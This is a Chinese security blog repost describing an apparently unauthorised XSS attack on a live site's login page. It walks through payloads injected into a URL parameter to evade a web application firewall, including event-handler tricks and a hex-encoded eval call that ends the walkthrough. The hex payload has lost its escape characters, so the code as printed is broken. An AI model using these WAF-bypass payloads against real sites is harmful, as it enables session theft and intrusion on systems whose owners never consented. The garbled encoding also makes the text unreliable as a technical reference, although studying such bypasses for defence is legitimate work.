实战|一次绕过waf进行xss的经历

华盟原创文章投稿奖励计划

实战|一次绕过waf进行xss的经历

今天室友遇到一个好玩的网站,下面是一些尝试绕过Waf进行XSS的记录。首先该网站没有对左右尖号和单双引号做任何过滤或转义。且有未知的waf或者其他阻止恶意访问的手段。

首先我的访问为 login.asp?f=1 时候,页面关键源码为

实战|一次绕过waf进行xss的经历

可能是表示登录次数的一个东西?(猜测) 现在我们知道的信息是参数f会填充到 loginflag这个隐藏框内。

尝试

首先做一些基础的XSS尝试:

script标签

login.asp?f=1"><script>

实战|一次绕过waf进行xss的经历

直接触发waf

img标签

login.asp?f=123" <img onload="alert(x)" src="

实战|一次绕过waf进行xss的经历

/login.asp?f=123" <img src="

实战|一次绕过waf进行xss的经历

可以正常的释放引号与尖号,也可以完整释放出 img标签。但是只要和on事件搭上边,就触发了这个waf。https://www.w3schools.com/jsref/dom_obj_event.asp 这里的一些基础事件都做了尝试。无解。

iframe标签

login.asp?f=123"> <iframe SRC="https://www.baidu.com

实战|一次绕过waf进行xss的经历

可解,但是总觉得没有弹窗是有点不爽的意思。

继续尝试执行JS

尝试使用H标签,例如h1

实战|一次绕过waf进行xss的经历

可以正常放出onload事件,所以此处这个waf禁止的只是img的on事件。尝试弹窗:

login.asp?f=1"><h1 onload="alert()">Hello</h1><img src="

实战|一次绕过waf进行xss的经历

我们又回到了waf上面,尝试了alert、confirm、prompt都被拦截。但是可以console.log。

login.asp?f=1"><h1 onmouseover="console.log(/cxk/)">Hello</h1><img src="

实战|一次绕过waf进行xss的经历

这就有点再次陷入尴尬,还是没有弹窗。不过我们已经可以执行js了,可以使用eval轻松的绕过。

login.asp?f="><h1 onmouseover=eval("x6ax61x76x61x73x63x72x69x70x74x3ax61x6cx65x72x74x28x22x58x53x53x22x29")>Hello</h1><img src="

实战|一次绕过waf进行xss的经历

总结

首先肯定是不存在大小写绕过的,不然也不会这么费劲。我们不难看出,该WAF主要针对两点做了一些手段。

  1. script标签

  2. img标签的 onXX事件

  3. onXX事件里面不能有弹窗函数 alert、confirm、prompt

治标不治本,当然针对XSS最傻瓜的处理办法还是不要放过尖号好引号。

内容来源:https://cloud.tencent.com/developer/article/1688902

文章来源:HACK之道

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文

END

实战|一次绕过waf进行xss的经历

本文来源HACK之道,经授权后由华盟君发布,观点不代表华盟网的立场,转载请联系原作者。

发表评论